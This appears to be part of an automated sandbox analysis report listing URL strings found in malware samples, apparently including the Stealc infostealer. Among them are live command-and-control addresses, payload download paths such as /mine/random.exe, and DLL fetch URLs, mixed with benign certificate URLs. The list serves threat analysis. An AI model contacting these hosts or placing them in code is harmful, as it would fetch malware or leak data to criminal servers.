String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: Offnewhere.exe, 00000007.00000000.2483037403.000000000087B000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://.css
Source: Offnewhere.exe, 00000007.00000000.2483037403.000000000087B000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://.jpg
Source: new_v8.exe, 0000001B.00000003.2701683074.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: GOLD1234.exe, 00000025.00000003.3476176212.0000000000F8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000005.00000003.3274795036.00000000014EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FD7000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000003.2905390578.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000003.3271971261.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000003.3274795036.00000000014F4000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000003.3274226781.0000000005FD7000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000003.3273657100.0000000005FA7000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000003.2912523697.0000000005F85000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000003.3273887118.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000005.00000003.3273657100.0000000005FA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php#
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000003.3273887118.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php1507001
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000003.3273887118.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php4
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000003.3273887118.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php:y
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000003.3273887118.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpAppData
Source: axplong.exe, 00000005.00000003.3273657100.0000000005FA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 00000005.00000003.3273657100.0000000005FA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000005.00000003.3273657100.0000000005FA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded5
Source: axplong.exe, 00000005.00000003.3273887118.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnu
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000003.3273887118.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpppData
Source: new_v8.exe	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: new_v8.exe, 0000001B.00000003.3586627682.0000000001238000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.3586761744.0000000001241000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exep
Source: new_v8.exe, new_v8.exe, 0000001B.00000003.3586809787.000000000123A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001B.00000003.3586627682.0000000001238000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3489672229.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: stealc_default2.exe, 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmp, stealc_default2.exe, 00000006.00000002.2615206943.000000000176E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2615206943.000000000176E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php)
Source: stealc_default2.exe, 00000006.00000002.2615206943.0000000001760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php3
Source: stealc_default2.exe, 00000006.00000002.2615206943.0000000001760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php7
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php=
Source: stealc_default2.exe, 00000006.00000002.2615206943.0000000001760000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpA
Source: stealc_default2.exe, 00000006.00000002.2615206943.0000000001760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpC:q
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpCoinomi
Source: stealc_default2.exe, 00000006.00000002.2615206943.0000000001760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpEx9
Source: stealc_default2.exe, 00000006.00000002.2615206943.0000000001760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpJS
Source: stealc_default2.exe, 00000006.00000002.2615206943.0000000001760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpS=o
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpU
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpZ
Source: stealc_default2.exe, 00000006.00000002.2615206943.0000000001760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpdo%
Source: stealc_default2.exe, 00000006.00000002.2615206943.0000000001760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpm
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpmainnet
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpnomi
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpq
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpsimple-storage.json
Source: stealc_default2.exe, 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phption:
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/freebl3.dll
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dll
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dll$
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dllb
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dlln
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dll
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllp
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllt
Source: stealc_default2.exe, 00000006.00000002.2615206943.000000000176E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.dll6=
Source: stealc_default2.exe, 00000006.00000002.2615206943.000000000176E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.dllL=
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dll
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dll6
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dll8
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dllJ
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dllN
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dllP
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dllO
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dlla
Source: stealc_default2.exe, 00000006.00000002.2615206943.000000000176E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17/yR
Source: stealc_default2.exe, 00000006.00000002.2613116477.00000000010DB000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: http://185.215.113.172fb6c2cc8dce150a.phption:
Source: stealc_default2.exe, 00000006.00000002.2615206943.000000000176E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17S
Source: stealc_default2.exe, 00000006.00000002.2615206943.000000000176E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.17iR
Source: f6f4816752.exe, 00000031.00000002.3155168475.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: f6f4816752.exe, 00000031.00000002.3155168475.0000000000F87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: f6f4816752.exe, 00000031.00000002.3155168475.0000000000F87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: f6f4816752.exe, 00000031.00000002.3155168475.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php#k
Source: f6f4816752.exe, 00000031.00000002.3155168475.0000000000F87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: f6f4816752.exe, 00000031.00000002.3155168475.0000000000F87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpI
Source: f6f4816752.exe, 00000031.00000002.3155168475.0000000000F87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpe
Source: f6f4816752.exe, 00000031.00000002.3155168475.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpq
Source: f6f4816752.exe, 00000031.00000002.3155168475.0000000000F87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/I
Source: f6f4816752.exe, 00000031.00000002.3155168475.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/bG
Source: f6f4816752.exe, 00000031.00000002.3155168475.0000000000F87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/j
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: splwow64[1].exe.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: new_v8.exe, 0000001B.00000003.2781801201.00000000039B5000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3018781566.00000000059FD000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3063024023.00000000039C0000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3181587075.0000000003B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: new_v8.exe, 0000001B.00000003.2781801201.00000000039B5000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3018781566.00000000059FD000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3063024023.00000000039C0000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3181587075.0000000003B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: splwow64[1].exe.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: splwow64[1].exe.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: splwow64[1].exe.5.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: splwow64.exe, 00000009.00000003.2554001535.0000000002905000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000013.00000003.2606591118.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, 0b44ippu.exe, 0000002E.00000003.2964754545.00000000027F2000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif.10.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: splwow64.exe, 00000009.00000003.2554001535.0000000002905000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000013.00000003.2606591118.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, 0b44ippu.exe, 0000002E.00000003.2964754545.00000000027F2000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif.10.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: splwow64.exe, 00000009.00000003.2554001535.0000000002905000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000009.00000002.2607696656.000000000041F000.00000004.00000001.01000000.0000000B.sdmp, Jurisdiction.pif, 00000013.00000003.2606591118.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, 0b44ippu.exe, 0000002E.00000003.2964754545.00000000027F2000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif.10.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: splwow64.exe, 00000009.00000003.2554001535.0000000002905000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000013.00000003.2606591118.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, 0b44ippu.exe, 0000002E.00000003.2964754545.00000000027F2000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif.10.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: new_v8.exe, 0000001B.00000003.2781801201.00000000039B5000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3018781566.00000000059FD000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3063024023.00000000039C0000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3181587075.0000000003B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: splwow64[1].exe.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: new_v8.exe, 0000001B.00000003.2781801201.00000000039B5000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3018781566.00000000059FD000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3063024023.00000000039C0000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3181587075.0000000003B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: new_v8.exe, 0000001B.00000003.2781801201.00000000039B5000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3018781566.00000000059FD000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3063024023.00000000039C0000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3181587075.0000000003B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: splwow64[1].exe.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: splwow64[1].exe.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: splwow64[1].exe.5.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: new_v8.exe, 0000001B.00000003.2781801201.00000000039B5000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3018781566.00000000059FD000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3063024023.00000000039C0000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3181587075.0000000003B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: splwow64[1].exe.5.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: new_v8.exe, 0000001B.00000003.2781801201.00000000039B5000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3018781566.00000000059FD000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3063024023.00000000039C0000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3181587075.0000000003B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Offnewhere.exe, 00000007.00000000.2483037403.000000000087B000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://home.sevjoi17sr.top/TCQEoezkVqyvrJjqBhZs12
Source: Offnewhere.exe, 00000007.00000000.2483037403.000000000087B000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: splwow64.exe, 00000009.00000002.2607663846.0000000000408000.00000002.00000001.01000000.0000000B.sdmp, splwow64.exe, 00000009.00000000.2544251638.0000000000408000.00000002.00000001.01000000.0000000B.sdmp, 0b44ippu.exe, 0000002E.00000002.3064076642.0000000000408000.00000002.00000001.01000000.0000001C.sdmp, 0b44ippu.exe, 0000002E.00000000.2955036581.0000000000408000.00000002.00000001.01000000.0000001C.sdmp, splwow64[1].exe.5.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: new_v8.exe, 0000001B.00000003.2781801201.00000000039B5000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3018781566.00000000059FD000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3063024023.00000000039C0000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3181587075.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, splwow64[1].exe.5.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: splwow64[1].exe.5.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FB9000.00000004.00000020.00020000.00000000.sdmp, splwow64[1].exe.5.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: axplong.exe, 00000005.00000003.3271971261.0000000005FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: splwow64[1].exe.5.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: new_v8.exe, 0000001B.00000003.2781801201.00000000039B5000.00000004.00000800.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3018781566.00000000059FD000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3063024023.00000000039C0000.00000004.00000800.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3181587075.0000000003B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: splwow64.exe, 00000009.00000003.2554001535.0000000002905000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000013.00000003.2606591118.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, 0b44ippu.exe, 0000002E.00000003.2964754545.00000000027F2000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: splwow64.exe, 00000009.00000003.2554001535.0000000002905000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000013.00000003.2606591118.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, 0b44ippu.exe, 0000002E.00000003.2964754545.00000000027F2000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: splwow64.exe, 00000009.00000003.2554001535.0000000002905000.00000004.00000020.00020000.00000000.sdmp, splwow64.exe, 00000009.00000002.2607696656.000000000041F000.00000004.00000001.01000000.0000000B.sdmp, Jurisdiction.pif, 00000013.00000003.2606591118.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, 0b44ippu.exe, 0000002E.00000003.2964754545.00000000027F2000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: splwow64.exe, 00000009.00000003.2554001535.0000000002905000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000013.00000003.2606591118.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, 0b44ippu.exe, 0000002E.00000003.2964754545.00000000027F2000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif.10.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: splwow64.exe, 00000009.00000003.2554001535.0000000002905000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000013.00000003.2606591118.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, 0b44ippu.exe, 0000002E.00000003.2964754545.00000000027F2000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif.10.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
